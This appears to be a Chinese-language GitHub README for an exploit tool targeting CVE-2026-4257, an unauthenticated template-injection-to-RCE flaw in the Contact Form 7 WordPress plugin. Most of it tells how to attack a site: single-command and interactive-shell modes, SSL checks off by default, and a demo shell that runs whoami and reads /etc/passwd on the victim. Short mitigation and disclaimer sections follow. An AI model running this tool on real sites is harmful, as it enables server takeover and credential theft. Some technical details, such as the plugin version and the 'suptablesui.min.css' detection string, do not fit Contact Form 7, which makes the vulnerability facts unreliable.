0xgh057r3c0n/CVE-2026-4257

# ⚡ WordPress - Contact Form 7 - 未认证 SSTI 至远程命令执行 [](https://opensource.org/licenses/MIT) [](https://www.python.org/downloads/) [](https://github.com/0xgh057r3c0n/CVE-2026-4257) [](https://wordpress.org/) **CVE-2026-4257** 是一个关键的安全漏洞，存在于 Contact Form 7 版本 1.7.36 及以下版本中，允许未认证的攻击者在目标服务器上执行任意系统命令。 ## 漏洞详情 | 属性 | 值 | |----------|-------| | **CVE ID** | CVE-2026-4257 | | **受影响软件** | Contact Form 7 ≤ 1.7.36 | | **漏洞类型** | 服务器端模板注入 (SSTI) | | **影响** | 远程命令执行 (RCE) | | **攻击向量** | 带有精心构造参数的 HTTP GET 请求 | | **认证要求** | 不需要 | | **CVSS 评分** | 9.8 (严重) | 该漏洞存在于插件的 Twig 模板渲染引擎中，未能正确净化表单字段中的用户输入，允许攻击者注入恶意的 Twig 代码并在服务器上执行。 ## 功能特性 - 🔍 自动版本检测 - 识别存在漏洞的 Contact Form 7 安装 - 🎯 字段自动发现 - 自动发现可用于利用的表单字段 - 💻 交互式 Shell - 具备额外功能的持久命令执行环境 - 🔐 Base64 载荷编码 - 绕过字符限制 - 🎨 彩色输出 - 可选颜色支持增强可读性 - 📝 详细模式 - 提供详细的调试信息 - 🔒 SSL 绕过 - 默认禁用 SSL 证书验证 - ⚡ 单命令模式 - 快速执行单个命令 ## 安装 ``` git clone https://github.com/0xgh057r3c0n/CVE-2026-4257.git cd CVE-2026-4257 ``` ### 依赖项 手动安装所需的 Python 包： ``` pip3 install requests pip3 install urllib3 ``` 或一次性安装两者： ``` pip3 install requests urllib3 ``` ## 用法 ### 基本语法 ``` python3 CVE-2026-4257.py [command] [options] ``` ### 快速入门示例 ``` # 检查目标是否易受攻击 python3 CVE-2026-4257.py http://target.com/contact/ # 执行单个命令 python3 CVE-2026-4257.py http://target.com/contact/ "id" # 交互式 Shell 模式 python3 CVE-2026-4257.py -i http://target.com/contact/ # 启用详细输出 python3 CVE-2026-4257.py -v http://target.com/contact/ "whoami" # 指定自定义表单字段 python3 CVE-2026-4257.py --field email http://target.com/contact/ "ls -la" ``` ## 交互式 Shell 交互式 Shell 提供了具有附加功能的持久命令执行环境。 ### 启动交互式 Shell ``` python3 CVE-2026-4257.py -i http://target.com/contact/ ``` ### Shell 命令 | 命令 | 描述 | |---------|-------------| | `` | 直接执行系统命令 | | `shell ` | 执行系统命令 | | `set_field ` | 更改表单字段 | | `show_info` | 显示目标信息 | | `detect_fields` | 检测可用的表单字段 | | `clear` | 清屏 | | `help` | 显示帮助菜单 | | `exit` / `quit` | 退出 Shell | ### 交互式 Shell 演示 ``` ┌─[CVE-2026-4257@0xgh057r3c0n]─[~] └──╼ $ whoami www-data ┌─[CVE-2026-4257@0xgh057r3c0n]─[~] └──╼ $ ls -la total 48 drwxr-xr-x 5 www-data www-data 4096 Oct 15 10:30 . drwxr-xr-x 3 www-data www-data 4096 Oct 15 10:30 .. -rw-r--r-- 1 www-data www-data 123 Oct 15 10:30 wp-config.php ┌─[CVE-2026-4257@0xgh057r3c0n]─[~] └──╼ $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ┌─[CVE-2026-4257@0xgh057r3c0n]─[~] └──╼ $ set_field your-email [*] Field changed to: your-email ``` ## 选项 | 选项 | 描述 | |--------|-------------| | `url` | 目标 URL，包含存在漏洞的 Contact Form 7 | | `payload` | 要执行的命令（交互模式下可选） | | `--field` | 用于利用的表单字段名称 | | `--interactive`, `-i` | 启动交互式 Shell 模式 | | `--verbose`, `-v` | 启用详细输出 | | `--no-color` | 禁用彩色输出 | | `--verify-ssl` | 验证 SSL 证书（默认禁用） | | `--help`, `-h` | 显示帮助信息 | ## 检测 该利用工具会自动检测： 1. **Contact Form 7 版本** - 检查目标是否易受攻击 2. **表单字段** - 识别可用的输入字段 3. **字段选择** - 自动选择最适合利用的字段 ### 手动检测 您可以通过检查页面源代码来手动检查漏洞： - `suptablesui.min.css?ver=` 字符串 - Contact Form 7 版本号 - 具有 `data-name` 属性的表单字段 ## 缓解措施 为防止 CVE-2026-4257： 1. **立即更新** - 升级到 Contact Form 7 版本 1.7.37 或更高版本 2. **应用补丁** - 如果无法更新，请应用官方安全补丁 3. **输入验证** - 实施额外的输入净化 4. **WAF 规则** - 部署 Web 应用程序防火墙规则以检测 SSTI 尝试 5. **最小权限** - 使用最小系统权限运行 Web 应用程序 ``` wp plugin update contact-form-7 ``` ## 免责声明 **本工具仅供教育和授权的安全测试使用。** - ⚠️ 不要在您不拥有或未经明确授权的系统上使用此利用 - ⚠️ 作者不对该工具的误用或造成的任何损害负责 - ⚠️ 在进行安全评估之前，始终获得适当的授权 - ⚠️ 未经授权访问计算机系统在大多数司法管辖区属于非法行为 ## 许可证 本项目根据 MIT 许可证授权。请参阅仓库中的 [LICENSE](LICENSE) 文件以获取详细信息。 ## 作者 **0xgh057r3c0n** - GitHub: [@0xgh057r3c0n](https://github.com/0xgh057r3c0n) - CVE-2026-4257 发现者 ## 致谢 - WordPress 安全社区 - Contact Form 7 插件团队对该漏洞的响应 - 为 SSTI 利用技术做出贡献的安全研究人员 ## 参考链接 - [CVE-2026-4257 详情](https://nvd.nist.gov/vuln/detail/CVE-2026-4257) - [Contact Form 7 官方站点](https://contactform7.com/) - [SSTI 漏洞指南](https://portswigger.net/web-security/server-side-template-injection) ## 支持 如果您发现此工具有用，请考虑： - ⭐ 在 GitHub 上为仓库加星 - 📢 负责任地与安全专业人士分享 - 🔒 报告任何问题或建议 **重要提示：** 本利用工具仅供授权的安全测试使用。未经授权的使用是非法的。在测试任何系统之前，务必获得书面许可。

标签：APT, Base64, CISA项目, Contact Form 7, CVE-2026-4257, CVSS 9.8, Exploit, HTTP GET, Payload编码, PoC, RCE, SSL绕过, SSTI, Twig, WordPress, 交互式Shell, 参数注入, 命令执行, 插件漏洞, 暴力破解, 服务器端模板注入, 未认证攻击, 模板注入, 编程工具, 远程代码执行, 逆向工具